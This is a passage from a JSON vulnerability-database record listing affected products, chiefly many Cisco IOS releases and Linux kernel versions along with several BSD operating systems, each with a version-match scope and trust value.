            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yu"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.8.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ec1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(27\\)sbc"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(25.4\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ya"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ew3"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)su2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xu2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)s10"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.50"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xd2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(8\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)e"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.19"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.36"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.19"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.35"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4mr"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)s5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)e10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(3\\)t2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.15"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11\\)ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)b1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5a\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(29a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)e3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.19.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2so"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s4a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16\\)bx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(4.3\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.12"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.7"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.19"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)s3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)s15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)yv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mb13c"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ewa3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)ea5a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.40"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.32"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ew2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xi"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(25\\)w5\\(27c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1eo"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1gb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)t5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)t2"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yc"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.25"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)bc1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.3.1"
          },
          {
            "_id": null,
            "model": "catalyst blade switch 3020",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(50\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8\\)sa5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)yd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(15\\)ca"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.47"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)st"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxd5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)ys"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7b\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.16"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ax"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(19a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xs"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ew4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)w5\\(28a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(13\\)w5\\(19c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t6"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.1.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(3h\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)tpc11a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ym"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(8a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)yb4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16\\)b1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(25\\)w5-27d"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(6a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2seb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)ex"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(13\\)ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ys"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)st5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(15\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)eb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zj1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yh"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.25"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(10\\)da2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5c\\)ex"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)b4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)ys_1.2\\(1\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(22a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3\\)xe"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc9a"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(25\\)w5\\(27\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(17\\)cc"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.33.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)t6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(10.5\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xf"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xg"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(16\\)aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)sxb10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9e\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2fx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yt"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.51"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xv4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.57"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0st"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)yb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)e12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)jx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xy"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.34"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.58"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ya"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yb"
          },
          {
            "_id": null,
            "model": "ios",
